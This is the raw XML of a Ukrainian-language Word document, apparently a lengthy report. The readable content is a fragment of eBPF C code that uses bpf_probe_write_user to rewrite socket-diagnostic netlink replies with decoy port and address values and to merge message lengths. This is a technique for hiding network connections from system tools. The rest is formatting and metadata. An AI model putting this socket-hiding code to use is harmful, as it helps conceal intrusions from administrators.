        <w:t xml:space="preserve">                        idiag_sport  = 13568;     // 53</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idiag_dport  = 0;         //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idiag_src    = 889192575; // 127.0.0.53</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idiag_dst    = 0;         // 0.0.0.0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idiag_if     = 1;         // /sys/class/net/lo/ifindex</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idiag_wqueue = 4096;</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break;</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default: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break;</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bpf_probe_write_user(iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_sport) , &amp;idiag_sport , sizeof(uint16_t));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bpf_probe_write_user(iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_dport) , &amp;idiag_dport , sizeof(uint16_t));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bpf_probe_write_user(iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_src)   , &amp;idiag_src   , sizeof(uint32_t));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bpf_probe_write_user(iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_dst)   , &amp;idiag_dst   , sizeof(uint32_t));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bpf_probe_write_user(iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_if)    , &amp;idiag_if    , sizeof(uint32_t));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bpf_probe_write_user(iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_wqueue), &amp;idiag_wqueue, sizeof(uint32_t));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else if (!change_me &amp;&amp; !new_msglen)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change_me = last_offest;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new_msglen = last_msglen + msghdr.nlmsg_len;</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else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new_msglen += msghdr.nlmsg_len;</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else if (change_me || new_msglen)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bpf_probe_write_user(iov_base+change_me+offsetof(struct nlmsghdr, nlmsg_len), &amp;new_msglen, sizeof(uint32_t));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change_me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new_msglen = 0;</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last_offest = offset;</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last_msglen = msghdr.nlmsg_len;</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offset += msghdr.nlmsg_len;</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w:t>
      </w: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p>
    <w:p w:rsidR="00F14887" w:rsidRPr="00F14887" w:rsidRDefault="00F14887" w:rsidP="00F14887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14887" w:rsidRPr="00F14887" w:rsidRDefault="00F14887" w:rsidP="00F14887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14887">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F14887" w:rsidRPr="00F14887" w:rsidSect="00216C07">
      <w:headerReference w:type="default" r:id="rId4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2FCD" w:rsidRDefault="002F2FCD" w:rsidP="00216C07">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002F2FCD" w:rsidRDefault="002F2FCD" w:rsidP="00216C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2FCD" w:rsidRDefault="002F2FCD" w:rsidP="00216C07">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002F2FCD" w:rsidRDefault="002F2FCD" w:rsidP="00216C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3456306"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w:rsidR="003C7FE5" w:rsidRDefault="003C7FE5" w:rsidP="00216C07">
        <w:pPr>
          <w:pStyle w:val="a5"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00AE68C7">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</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BE5389"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="119271C2"/>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6CF30453"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DAE22A6"/>
    <w:lvl w:ilvl="0" w:tplc="5BBCAFB6">
      <w:start w:val="3"/>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905"/>
    <w:rsid w:val="00003BFC"/>
    <w:rsid w:val="0002512A"/>
    <w:rsid w:val="00040500"/>
    <w:rsid w:val="0005354B"/>
    <w:rsid w:val="0005369A"/>
    <w:rsid w:val="0006566A"/>
    <w:rsid w:val="000726E8"/>
    <w:rsid w:val="00080E17"/>
    <w:rsid w:val="00086878"/>
    <w:rsid w:val="00095429"/>
    <w:rsid w:val="000B0BB1"/>
    <w:rsid w:val="000C16D9"/>
    <w:rsid w:val="000E2E96"/>
    <w:rsid w:val="000F7457"/>
    <w:rsid w:val="001258F7"/>
    <w:rsid w:val="0014522B"/>
    <w:rsid w:val="00155622"/>
    <w:rsid w:val="0015581F"/>
    <w:rsid w:val="00172EF0"/>
    <w:rsid w:val="00191CBC"/>
    <w:rsid w:val="00195BFD"/>
    <w:rsid w:val="001A5796"/>
    <w:rsid w:val="001B4111"/>
    <w:rsid w:val="001C076D"/>
    <w:rsid w:val="001E0E74"/>
    <w:rsid w:val="001E6DBC"/>
    <w:rsid w:val="00216C07"/>
    <w:rsid w:val="00216C8D"/>
    <w:rsid w:val="0022205F"/>
    <w:rsid w:val="002226F7"/>
    <w:rsid w:val="00234651"/>
    <w:rsid w:val="00236344"/>
    <w:rsid w:val="0024039E"/>
    <w:rsid w:val="00257E61"/>
    <w:rsid w:val="00265835"/>
    <w:rsid w:val="002865BF"/>
    <w:rsid w:val="0029642F"/>
    <w:rsid w:val="002B5777"/>
    <w:rsid w:val="002C0FC7"/>
    <w:rsid w:val="002D0A52"/>
    <w:rsid w:val="002D2F83"/>
    <w:rsid w:val="002D54D8"/>
    <w:rsid w:val="002F2FCD"/>
    <w:rsid w:val="0032308E"/>
    <w:rsid w:val="003269E9"/>
    <w:rsid w:val="00332D6C"/>
    <w:rsid w:val="003400C8"/>
    <w:rsid w:val="003560E6"/>
    <w:rsid w:val="00362E9B"/>
    <w:rsid w:val="00372D03"/>
    <w:rsid w:val="00373B50"/>
    <w:rsid w:val="00376B02"/>
    <w:rsid w:val="003A17E3"/>
    <w:rsid w:val="003A25E5"/>
    <w:rsid w:val="003A60B1"/>
    <w:rsid w:val="003B2F09"/>
    <w:rsid w:val="003B3939"/>
    <w:rsid w:val="003C65DB"/>
    <w:rsid w:val="003C7FE5"/>
    <w:rsid w:val="003D0F8D"/>
    <w:rsid w:val="003E765A"/>
    <w:rsid w:val="003E7A2D"/>
    <w:rsid w:val="003F3C0B"/>
    <w:rsid w:val="003F45FE"/>
    <w:rsid w:val="00404F7B"/>
    <w:rsid w:val="00407DC7"/>
    <w:rsid w:val="004160F8"/>
    <w:rsid w:val="0042687A"/>
    <w:rsid w:val="00441F21"/>
    <w:rsid w:val="00444806"/>
    <w:rsid w:val="004C0905"/>
    <w:rsid w:val="004C0A51"/>
    <w:rsid w:val="004C4D9D"/>
    <w:rsid w:val="004E7209"/>
    <w:rsid w:val="005366E0"/>
    <w:rsid w:val="005503AA"/>
    <w:rsid w:val="00585C1D"/>
    <w:rsid w:val="005A4215"/>
    <w:rsid w:val="005A5190"/>
    <w:rsid w:val="005B1D8B"/>
    <w:rsid w:val="005B2A6E"/>
    <w:rsid w:val="005B5269"/>
    <w:rsid w:val="005F0B54"/>
    <w:rsid w:val="00614410"/>
    <w:rsid w:val="00614BED"/>
    <w:rsid w:val="00644C3C"/>
    <w:rsid w:val="00673738"/>
    <w:rsid w:val="00683544"/>
    <w:rsid w:val="0069465C"/>
    <w:rsid w:val="006A7651"/>
    <w:rsid w:val="0071734C"/>
    <w:rsid w:val="00721BFD"/>
    <w:rsid w:val="007372C7"/>
    <w:rsid w:val="007434F7"/>
    <w:rsid w:val="0074604D"/>
    <w:rsid w:val="00753001"/>
    <w:rsid w:val="007538B2"/>
    <w:rsid w:val="007717DA"/>
    <w:rsid w:val="00782BA2"/>
    <w:rsid w:val="00782CB3"/>
    <w:rsid w:val="007874E0"/>
    <w:rsid w:val="00787E32"/>
    <w:rsid w:val="00797EE8"/>
    <w:rsid w:val="007A2384"/>
    <w:rsid w:val="007A4DA9"/>
    <w:rsid w:val="007A4EF9"/>
    <w:rsid w:val="007B4C2C"/>
    <w:rsid w:val="007C3ACC"/>
    <w:rsid w:val="007F018F"/>
    <w:rsid w:val="008152AB"/>
    <w:rsid w:val="008335DA"/>
    <w:rsid w:val="00847C75"/>
    <w:rsid w:val="008670DF"/>
    <w:rsid w:val="008760A0"/>
    <w:rsid w:val="008A258A"/>
    <w:rsid w:val="008C1502"/>
    <w:rsid w:val="008C7EDF"/>
    <w:rsid w:val="008D4C69"/>
    <w:rsid w:val="008D779C"/>
    <w:rsid w:val="00901C8B"/>
    <w:rsid w:val="00901F68"/>
    <w:rsid w:val="009107C8"/>
    <w:rsid w:val="00910805"/>
    <w:rsid w:val="0094256D"/>
    <w:rsid w:val="0095301E"/>
    <w:rsid w:val="00953087"/>
    <w:rsid w:val="00964D26"/>
    <w:rsid w:val="00971B89"/>
    <w:rsid w:val="009746C3"/>
    <w:rsid w:val="00992026"/>
    <w:rsid w:val="00994980"/>
    <w:rsid w:val="009A4CE1"/>
    <w:rsid w:val="009C0859"/>
    <w:rsid w:val="009C560D"/>
    <w:rsid w:val="009F0663"/>
    <w:rsid w:val="00A06EAF"/>
    <w:rsid w:val="00A11308"/>
    <w:rsid w:val="00A40261"/>
    <w:rsid w:val="00A50F90"/>
    <w:rsid w:val="00A538A7"/>
    <w:rsid w:val="00A745B7"/>
    <w:rsid w:val="00A80F8E"/>
    <w:rsid w:val="00A93F26"/>
    <w:rsid w:val="00AA5B2B"/>
    <w:rsid w:val="00AB50E1"/>
    <w:rsid w:val="00AC3268"/>
    <w:rsid w:val="00AD63AB"/>
    <w:rsid w:val="00AE1B3C"/>
    <w:rsid w:val="00AE2010"/>
    <w:rsid w:val="00AE68C7"/>
    <w:rsid w:val="00B01357"/>
    <w:rsid w:val="00B25B43"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B56C0A"/>
    <w:rsid w:val="00B7322A"/>
    <w:rsid w:val="00BB02FF"/>
    <w:rsid w:val="00BC111E"/>
    <w:rsid w:val="00BC54F7"/>
    <w:rsid w:val="00BC67CB"/>
    <w:rsid w:val="00BC6B10"/>
    <w:rsid w:val="00BC794C"/>
    <w:rsid w:val="00BD28B5"/>
    <w:rsid w:val="00BD5158"/>
    <w:rsid w:val="00BF4687"/>
    <w:rsid w:val="00C20AF8"/>
    <w:rsid w:val="00C23745"/>
    <w:rsid w:val="00C30F54"/>
    <w:rsid w:val="00C31695"/>
    <w:rsid w:val="00C31EAF"/>
    <w:rsid w:val="00C4419A"/>
    <w:rsid w:val="00C57862"/>
    <w:rsid w:val="00C60979"/>
    <w:rsid w:val="00C727FC"/>
    <w:rsid w:val="00C95949"/>
    <w:rsid w:val="00CA3CCB"/>
    <w:rsid w:val="00CB205D"/>
    <w:rsid w:val="00CC6CB6"/>
    <w:rsid w:val="00CC6F88"/>
    <w:rsid w:val="00CC712B"/>
    <w:rsid w:val="00CE06DF"/>
    <w:rsid w:val="00D0623D"/>
    <w:rsid w:val="00D30D8A"/>
    <w:rsid w:val="00D43D38"/>
    <w:rsid w:val="00D533AA"/>
    <w:rsid w:val="00D56D15"/>
    <w:rsid w:val="00D75D2E"/>
    <w:rsid w:val="00D81CCF"/>
    <w:rsid w:val="00D81CE5"/>
    <w:rsid w:val="00DC77DC"/>
    <w:rsid w:val="00DD29B0"/>
    <w:rsid w:val="00DE094C"/>
    <w:rsid w:val="00E20601"/>
    <w:rsid w:val="00E21649"/>
    <w:rsid w:val="00E54761"/>
    <w:rsid w:val="00E64C38"/>
    <w:rsid w:val="00E90B18"/>
    <w:rsid w:val="00E96CA1"/>
    <w:rsid w:val="00EA60B6"/>
    <w:rsid w:val="00EB5FBE"/>
    <w:rsid w:val="00ED7EED"/>
    <w:rsid w:val="00EE1E61"/>
    <w:rsid w:val="00EE43E9"/>
    <w:rsid w:val="00EE5C11"/>
    <w:rsid w:val="00EE6AAF"/>
    <w:rsid w:val="00EF0BDE"/>
    <w:rsid w:val="00EF6846"/>
    <w:rsid w:val="00F13941"/>
    <w:rsid w:val="00F14887"/>
    <w:rsid w:val="00F163FA"/>
    <w:rsid w:val="00F23047"/>
    <w:rsid w:val="00F35B33"/>
    <w:rsid w:val="00F50033"/>
    <w:rsid w:val="00F52DE5"/>
    <w:rsid w:val="00F541F5"/>
    <w:rsid w:val="00F64211"/>
    <w:rsid w:val="00F808FA"/>
    <w:rsid w:val="00F95C31"/>
    <w:rsid w:val="00FD1281"/>
    <w:rsid w:val="00FD3D2E"/>
    <w:rsid w:val="00FF5E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5544D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F907E66E-915D-4B8E-B2EC-C4AD3DA3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130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0F54"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007C3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16C0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16C07"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00216C0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16C07"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC54F7"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C560D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C560D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C560D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C560D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C560D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00787E32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00787E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729386">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="420492026">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1778524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wmf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.wmf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.wmf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject11.bin"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject14.bin"/><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oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.wmf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.wmf"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject10.bin"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject13.bin"/><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wmf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject8.bin"/><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oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.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oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.wmf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject7.bin"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject12.bin"/><Relationship Id="rId48"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oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject6.bin"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject9.bin"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.wmf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.wmf"/><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5499</TotalTime>
  <Pages>68</Pages>
  <Words>15605</Words>
  <Characters>88951</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>741</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c:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Z</cp:lastModifiedBy>
  <cp:revision>121</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-26T09:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-19T06:37:00Z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